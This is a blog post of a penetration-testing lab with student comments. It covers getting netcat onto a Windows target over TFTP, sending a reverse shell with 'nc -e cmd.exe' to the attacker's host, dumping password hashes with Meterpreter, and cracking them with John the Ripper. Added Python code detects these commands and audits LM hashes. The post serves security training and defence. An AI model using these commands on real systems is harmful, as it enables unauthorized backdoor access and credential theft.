Thursday, December 1, 2011

Project 11 - Setting Up a Reverse Shell, Dumping Passwords, and Cracking Passwords

Exercise 1: Using Netcat to Set Up a Reverse Shell

In the following exercise, you will use the Meterpreter payload from the previous lab to set up a Netcat listener and reverse shell. This will allow you to remotely control the target system after you close your Meterpreter session, and thus come back to the target system whenever you want:
1. The first step in setting up a Netcat listener is to get the Netcat executable onto the target system so it can be used to connect back to your attack system. There are a number of ways this can be accomplished; here you will use Trivial File Transfer Protocol (TFTP) to copy the Netcat executable from your BackTrack system to the target system.

2. In the bottom left of your BackTrack desktop, click the dragon-looking icon, then Services/TFTPD/Start TFTPD. This starts the TFTP daemon (server service) on your BackTrack system. You should get a message that TFTPD is running on port 69 with /tmp as its home directory. Click the OK button.

3. You are now going to copy the Netcat executable from its default location (/pentest/windows-binaries/tools) to the /tmp directory on your BackTrack system so it can be fetched over TFTP from the target system. To do so, open a new shell (leave the current Meterpreter shell open) and type the following (type only the command after the prompt):
user1@pentest:~#cp /pentest/windows-binaries/tools/nc.exe /tmp

4. Change into the /tmp directory and list its contents (type only the commands after the prompts):
user1@pentest:~#cd /tmp
user1@pentest:~#ls -al
Look for the nc.exe file in the listing.

5. Leave this shell open

6. Go to the Meterpreter shell you left open. At the Windows command shell prompt, type the following (type only the command after the prompt):
C:\WINDOWS\system32>tftp -i BackTrack_IP_address get nc.exe
Syntax breakdown:
tftp: program name
-i: binary image transfer mode (the file is transferred byte for byte rather than as text, which is required for an executable)
BackTrack_IP_address: IP address of your BackTrack system
get nc.exe: retrieves the nc.exe file from your BackTrack system onto the target system
If the file transfer was successful, you should see a message similar to this: “Transfer successful: 59392 bytes in 1 second, 59392 bytes/s”

7. Now you will set up both the client and server portions of the backdoor

8. In the second shell you opened in step #3 (not the Meterpreter shell), start the Netcat program on your BackTrack system in listening mode (server mode) by typing the following (type only the command after the prompt):
user1@pentest:~#nc -v -l -p 3333
Syntax breakdown:
nc: program name
-v: verbose mode
-l: listen mode (wait for an inbound connection)
-p 3333: the local port to listen on on the BackTrack system

9. From the Meterpreter shell (where you have the Windows command shell prompt open on the target system), start the client side of the Netcat backdoor (type only the command after the prompt, on one line):
C:\WINDOWS\system32>nc -e cmd.exe BackTrack_IP_address 3333
Syntax breakdown:
nc: program name
-e cmd.exe: program to execute once the connection is made; its input and output are attached to the network socket
BackTrack_IP_address 3333: your BackTrack system’s IP address and the port it is listening on
This shovels a Windows command shell from the target system to your BackTrack system; it appears in the non-Meterpreter shell you opened in step #3.

10. Close the Meterpreter shell window (click the X in the upper-right corner of the window)

11. Notice your BackTrack prompt has turned into a Windows command shell prompt. You now have a backdoor into the target system

12. Confirm that the shell is running on the target system by typing (type only the command after the prompt):
C:\WINDOWS\system32>dir nc.exe

13. Leave your Netcat listener shell open
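Seen from the defender's side, the two commands run on the target in steps 6 and 9 are exactly what shows up in process-creation logging. The Python below is an added example (not part of the original lab) that runs two pattern rules over constructed sample command lines; the "image | command line" record format, the sample values and the IP address are assumptions, and the rules also accept the ncat and powershell.exe variants, which go beyond what the lab uses.

```python
import re
from typing import List, Dict

# Constructed process-creation records, "image | command line" (not real log data).
SAMPLE_EVENTS = [
    r"C:\WINDOWS\system32\cmd.exe | cmd.exe /c dir",
    r"C:\WINDOWS\system32\tftp.exe | tftp -i 192.0.2.10 get nc.exe",
    r"C:\WINDOWS\system32\nc.exe | nc -e cmd.exe 192.0.2.10 3333",
    r"C:\Program Files\App\app.exe | app.exe --update",
]

# Rule 1: tftp client in binary mode (-i) pulling a file onto the host (step 6).
TFTP_GET = re.compile(r"\btftp(?:\.exe)?\b.*\s-i\s.*\bget\b", re.IGNORECASE)
# Rule 2: netcat/ncat started with -e to attach a command interpreter to a socket (step 9).
NC_EXEC = re.compile(r"\bnc(?:\.exe|at)?\b.*\s-e\s+(?:cmd|powershell)(?:\.exe)?\b",
                     re.IGNORECASE)


def classify(cmdline: str):
    """Return the rule name a command line matches, or None. These are heuristics:
    tune them to your environment (TFTP has legitimate uses on some hosts)."""
    if TFTP_GET.search(cmdline):
        return "tftp_binary_download"
    if NC_EXEC.search(cmdline):
        return "netcat_shell_exec"
    return None


def scan(events: List[str]) -> List[Dict[str, str]]:
    """Split each record into image and command line and collect the matches."""
    findings = []
    for ev in events:
        image, _, cmd = ev.partition(" | ")
        rule = classify(cmd.strip())
        if rule:
            findings.append({"image": image.strip(), "rule": rule, "cmdline": cmd.strip()})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['rule']:22} {f['image']}  <-  {f['cmdline']}")
```

The two hits correspond to the file staging and the shell-to-socket step; the benign cmd.exe and application launches are ignored.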

Exercise 2: Using Meterpreter to Dump Windows Password Hashes

In the following exercise, you will use the built-in capability of the Meterpreter payload to dump the password hashes of the accounts on your target system. These hashes will be used later in password cracking attempts, with the ultimate goal of obtaining additional usernames and passwords:

1. Close your reverse shell and return to the Meterpreter prompt (type only the command after the prompt):
C:\WINDOWS\system32>exit

2. With a Meterpreter shell in place, type (type only the command after the prompt):
meterpreter > hashdump

3. The password hashes of the target system’s local accounts are printed to the screen.
The output lists one account per line (pwdump format) and looks as follows:
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E:::
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::
Fields are separated by colons. The fields are:
 1st field: username (Administrator, User1, etc.)
 2nd field: Relative Identifier (RID): the final component of the account’s Security Identifier (SID), typically its last 3-4 digits, which is unique to each account
 3rd field: LM hash
 4th field: NTLM hash

4. Based on previous lab techniques, determine a way to get the contents of the hashdump output from your BackTrack system to your Windows attack system

5. Save the file as hashes.txt in the c:\temp directory on your Windows attack system
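To make the hash format concrete, here is an added Python example (not from the original lab) that parses pwdump-style lines into the four fields described above and reports what the LM hash alone reveals about the account, with nothing cracked. It uses two lines from the output above plus one constructed Guest line; the empty-LM block AAD3B435B51404EE and the empty-password NT hash 31D6CFE0D16AE931B73C59D7E0C089C0 are the standard constants.

```python
import re
from typing import Dict, List

LM_EMPTY_HALF = "AAD3B435B51404EE"             # LM block for an empty 7-char half
LM_EMPTY = LM_EMPTY_HALF * 2                   # LM value when no LM hash is stored
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"  # NT hash of an empty password

# Two lines from the lab output plus one constructed Guest line (not a real dump).
SAMPLE_DUMP = """\
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
"""

# username:RID:LM:NT:::  (each hash is 16 bytes, written as 32 hex characters)
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9A-Fa-f]{32}):([0-9A-Fa-f]{32}):")


def parse_pwdump(text: str) -> List[dict]:
    """Split pwdump lines into the four fields; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append({"user": user, "rid": int(rid), "lm": lm.upper(), "nt": nt.upper()})
    return entries


def audit(entry: dict) -> List[str]:
    """Findings derivable from the hash structure alone, without cracking anything."""
    flags = []
    if entry["lm"] != LM_EMPTY:
        # An LM hash is present: the password is at most 14 chars, case-folded, and
        # stored as two independent 7-char DES blocks, so NoLMHash is not enforced.
        flags.append("lm_hash_stored")
        if entry["lm"][16:] == LM_EMPTY_HALF:
            # The second block is the empty block, so the password is 7 chars or fewer.
            flags.append("password_7_or_fewer_chars")
    if entry["nt"] == NT_EMPTY:
        flags.append("empty_password")
    return flags


def audit_dump(text: str) -> Dict[str, List[str]]:
    """Map each account name to its findings."""
    return {e["user"]: audit(e) for e in parse_pwdump(text)}
```

Any account flagged lm_hash_stored shows that LM hash storage is still enabled on the target, which is why the lab can crack these hashes in minutes; the second-block check is the same property that makes John report each 7-character half separately.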

Exercise 3: Cracking Windows Password Hashes Using John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of *NIX, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak passwords. In the rest of this lab, John the Ripper is referred to as John. In the following exercise, you will use the command-line version of John to crack the LM password hashes from your target system:

1. Get the password hashes from your target system to your BackTrack system, saving them in /root/ceh, in a file called hashes.txt

2. Change into the directory where John is located (type only the commands after the prompts):
user1@pentest:~#cd /pentest/passwords/jtr
user1@pentest:~#pwd
/pentest/passwords/jtr

3. Type (type only the command after the prompt):
user1@pentest:~#./john /root/ceh/hashes.txt
Syntax breakdown:
./john: program name
/root/ceh/hashes.txt: the password hashes from your target system
Your output will look something like this (an LM hash is computed over two independent 7-character halves, so John reports each half separately, marked :1 and :2):
Loaded x password hashes with no different salts (NT LM DES [32/32 BS])
PACHYDE (smendez?e?:1)
RM (smendez?e?:2)
guesses: x time: 0:00:08:23 100% c/s: 9204K trying: ZYUUZOK - ZZZZZZZ

4. In a second BackTrack shell, use the --show option to display the password cracking status (type only the command after the prompt):
user1@pentest:~#./john --show /root/ceh/hashes.txt | less

NOTE: you will need to re-run this command periodically to get the latest information on cracked passwords and the hashes still left to crack

3 comments:

  1. Command to open a Windows command shell through Meterpreter : execute -f cmd.exe -i -H

  2. Had a few problems in this assignment, posting some solutions.

    Exercise 1: In step 6/7, it has you transfer the nc.exe file to the remote Windows machine via tftp. I was getting a timeout error when I tried to send the file through tftp. I checked the /var/log/daemon.log file on the Backtrack machine and from what I could gather, the tftp daemon on the backtrack machine could not connect to the Windows machine on ports 1322 and 1336. I don't know where the .conf file for tftpd is located on Backtrack installations, so I decided to forgo the tftp and just download the nc.exe file through other means that wouldn't work in a real hacking scenario. I uploaded the file and downloaded it to the desktop on the Windows machine (Link here: http://www.4shared.com/file/j2A4LPVk/nc_online.html?)

    I then continued on with project 11 as if steps 6-7 worked. In retrospect, I think this exercise would have worked without doing steps 6-7 or my workaround, although I'm not certain.

    Exercise 2:
    When you get to step 2, if you are entering in hashdump and it's telling you the command isn't found, first try running the command "use priv". After that, try it again, and it should work. This ended up outputting a large block of hashes. I also figured out that while in the meterpreter shell, if I viewed the process list by typing in "ps", found a service process (I used svchost.exe), and then typed in "migrate [PID]", I could then type in "run hashdump", and it would output only the hashes for the Administrator and Guest accounts. My problem at this point was getting the hashdump output into a text file to send to the Windows machine, since the meterpreter shell doesn't accept output redirection like Linux's BASH shell does (the > and >> characters that we have used in previous exercises). I ended up just copying the Administrator and Guest entries into the nano text editor and saving the file as "/root/hashes.txt"

    I then used JTR to crack the hash file, and while it ends up saying that cracking the two hashes completed successfully, it doesn't actually output the passwords as it should. Oh well.

  3. I apologize for the grammatical errors. Project 11 fried my little brain :(
